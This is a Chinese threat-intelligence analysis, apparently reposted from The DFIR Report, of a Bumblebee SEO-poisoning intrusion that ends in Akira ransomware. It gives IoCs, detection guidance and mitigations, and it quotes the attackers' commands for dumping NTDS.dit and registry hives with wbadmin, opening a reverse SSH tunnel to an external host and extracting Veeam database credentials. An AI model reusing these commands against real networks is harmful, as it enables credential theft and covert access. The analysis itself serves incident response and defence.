文章总结： 文档分析了Bumblebee恶意软件通过Bing搜索的SEO投毒传播木马化ManageEngine安装包，攻击者利用IT管理员权限在44小时内完成横向移动、凭据转储、RustDesk持久化、SFTP数据外泄，最终部署Akira勒索软件。关键发现包括攻击链时间线、IoC指标及Swisscom报告的9小时TTR，并提供检测规则与缓解措施如监控LSASS访问、限制远程工具安装等。 综合评分： 87 文章分类： 恶意软件,渗透测试,应急响应,漏洞预警,威胁情报

从 Bing 搜索到勒索软件：Bumblebee 投递 Akira 完整分析

bitbot bitbot

Desync InfoSec

2026年4月4日 22:16 北京

从 Bing 搜索到勒索软件：Bumblebee 与 AdaptixC2 如何投递 Akira 勒索软件

来源：The DFIR Report · 2025-11-04 · 案例编号 #TB36726

📌 核心要点

• Bumblebee 恶意软件自 2021 年底以来一直被用作初始访问工具，2023 年开始使用 SEO 投毒作为分发机制
• 用户在 Bing 搜索「ManageEngine OpManager」时被重定向到恶意网站 opmanager[.]pro，下载了木马化的 MSI 安装包
• 攻击者获取初始访问后横向移动到域控制器，转储凭据，安装 RustDesk 持久化，使用 SFTP 外泄数据
• 最终部署 Akira 勒索软件，两天后返回加密子域系统
• 从初始访问到首次勒索部署仅 44 小时，Swisscom 报告的 TTR 仅 9 小时

一、概述

Bumblebee 恶意软件自 2021 年底以来一直被威胁行为者用作初始访问工具。2023 年，该恶意软件首次被报告使用 SEO 投毒（搜索引擎优化投毒）作为分发机制。2025 年 5 月，Cyjax 报告了一场使用此方法的攻击活动，冒充各种 IT 工具。

2025 年 7 月，我们观察到威胁行为者通过此 SEO 投毒活动入侵了一个组织。用户搜索「ManageEngine OpManager」时被重定向到恶意网站，该网站提供了木马化的软件安装程序。此操作导致 Bumblebee 恶意软件的部署，为威胁行为者提供了环境的初始访问权限。

入侵迅速从单个受感染主机升级为全面的网络攻陷。初始访问后，威胁行为者横向移动到域控制器，转储凭据，安装持久化远程访问工具，并使用 SFTP 客户端外泄数据。入侵最终在根域部署了 Akira 勒索软件。威胁行为者两天后返回重复此过程，加密子域内的系统。

此攻击活动在 7 月影响了多个组织，包括 Swisscom B2B CSIRT 响应的一起类似入侵。

二、初始访问

此次入侵始于用户在 Bing 上搜索「ManageEngine OpManager」时被重定向到恶意网站 opmanager[.]pro。

▲ Bing 搜索结果中的恶意网站 opmanager[.]pro

用户下载了木马化的 MSI 安装程序 ManageEngine-OpManager.msi，执行后在安装合法软件的同时，通过 consent.exe 加载了 Bumblebee 恶意软件 msimg32.dll。

▲ 恶意 MSI 安装程序执行流程

Bumblebee 恶意软件与以下 C2 服务器建立了命令与控制通信：

• 109.205.195[.]211:443（DGA 域名）
• 188.40.187[.]145:443（DGA 域名）

通过针对 IT 管理工具和软件，执行恶意软件的用户是 Active Directory 中高度特权的 IT 管理员账户，为威胁行为者提供了轻松的特权访问。

三、执行与持久化

初始执行后约 5 小时，Bumblebee 部署了 AdaptixC2 信标（AdgNsy.exe），建立了到 172.96.137[.]160:443 的新 C2 通道。威胁行为者随后使用内置 Windows 工具启动内部侦察：

systeminfo nltest /dclist: whoami /groups net group domain admins /dom

随后，威胁行为者创建了两个新域账户用于持久化：

• backup_DA
• backup_EA（添加到「Enterprise Administrators」组）

四、凭据访问与横向移动

使用特权账户 backup_EA，威胁行为者通过 RDP 连接到域控制器，并使用 wbadmin.exe 转储了 NTDS.dit 文件：

wbadmin.exe start backup -backuptarget:\127.0.0.1\C$\ProgramData\ -include”:C:\windows\NTDS\ntds.dit,C:\windows\system32\config\SYSTEM,C:\windows\system32\config\SECURITY” -quiet

为持久化和重新进入，威胁行为者在多个主机上安装了 RustDesk 远程访问工具。在后续会话中，威胁行为者建立了到外部服务器 193.242.184[.]150 的 SSH 隧道：

ssh [email protected] -R *:10400 -p22

五、发现与数据收集

威胁行为者部署了重命名的 SoftPerfect 网络扫描器（n.exe）进行网络发现。随后针对备份服务器，尝试从 Veeam PostgreSQL 数据库转储凭据：

psql.exe -U postgres –csv -d VeeamBackup -w -c “SELECT user_name,password,description,change_time_utc FROM credentials”

大约在同一时间，威胁行为者在文件服务器上安装了 FileZilla，并通过 SFTP 将数据外泄到 185.174.100[.]203。

六、勒索软件部署

威胁行为者在多个工作站上使用 rundll32.exe 配合 comsvcs.dll 进行 LSASS 内存转储，然后部署了 Akira 勒索软件 payload locker.exe。

▲ 完整攻击链执行流程

▲ Akira 勒索软件部署与加密过程

首次勒索软件部署两天后，威胁行为者通过 RustDesk 返回，连接到子域控制器，执行另一轮发现（Invoke-ShareFinder 和 DNS 区域导出命令），然后在子域部署 Akira 勒索软件。

⚠️ 关键指标

从初始访问到首次勒索软件部署：44 小时

Swisscom B2B CSIRT 报告的 TTR：仅 9 小时

七、IoC 指标

网络 IoC

| 指标 | 用途 | | — | — | | opmanager[.]pro | 恶意网站（木马化安装程序） | | angryipscanner.org | 恶意网站 | | axiscamerastation.org | 恶意网站 | | ev2sirbd269o5j.org / 2rxyt9urhq0bgj.org | Bumblebee DGA 域名 | | 109.205.195[.]211 / 188.40.187[.]145 | Bumblebee C2 | | 172.96.137[.]160 | AdaptixC2 C2 | | 193.242.184[.]150 | SSH 隧道主机 | | 185.174.100[.]203 | SFTP 外泄服务器 |

文件哈希

| 文件 | SHA256 | | — | — | | ManageEngine-OpManager.msi | 186b26df63df3b7334043b47659cba4185c948629d857d47452cc1936f0aa5da | | msimg32.dll (Bumblebee) | a6df0b49a5ef9ffd6513bfe061fb60f6d2941a440038e2de8a7aeb1914945331 | | locker.exe (Akira) | de730d969854c3697fd0e0803826b4222f3a14efe47e4c60ed749fff6edce19d |

八、检测规则与威胁狩猎

🔍 关键检测方法

初始访问检测

• 监控从用户目录执行的 MSI 安装，随后产生可疑子进程（consent.exe、msimg32.dll 异常加载）
• 审查名称可疑的 MSI 包（ManageEngine-OpManager.msi、rustdesk-*.msi）

凭据访问检测

• 检测通过 comsvcs.dll 的 LSASS 内存转储行为
• 监控 Veeam PostgreSQL 凭据提取命令
• 检测 wbadmin 滥用转储 NTDS.dit

发现与持久化检测

• 狩猎短时间内执行的快速域枚举序列（systeminfo → nltest → whoami → net group）
• 检测新创建的域账户立即进行权限提升（backup_EA 添加到 Enterprise Admins）

C2 与外泄检测

• 监控 SSH 反向隧道、Bumblebee DGA 模式（8-14 位随机字符.org）
• 检测服务器上安装 FileZilla 后的大规模出站传输

九、缓解措施

1. 阻止已知 C2 IP：109.205.195[.]211、188.40.187[.]145、172.96.137[.]160、193.242.184[.]150、185.174.100[.]203
2. 阻止恶意域名：opmanager[.]pro、angryipscanner.org、axiscamerastation.org
3. 检测哈希：186b26df…（恶意 MSI）、a6df0b49…（Bumblebee）、de730d96…（Akira）
4. 加强 IT 管理工具管控：限制用户自行下载和安装 IT 管理工具
5. 监控 LSASS 访问：检测 rundll32.exe comsvcs.dll 的 LSASS 转储行为
6. 限制远程访问工具：监控和限制 RustDesk 等工具的安装

MITRE ATT&CK：初始访问 T1190（SEO 投毒） · 执行 T1059 · 持久化 T1219（RustDesk） · 权限提升 T1078 · 防御规避 T1036 · 凭据访问 T1003（LSASS） · 发现 T1082/T1016/T1087 · 横向移动 T1021（RDP） · 数据外泄 T1567（SFTP） · 影响 T1486（勒索软件）

原文：The DFIR Report

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：Desync InfoSec bitbot bitbot《从 Bing 搜索到勒索软件：Bumblebee 投递 Akira 完整分析》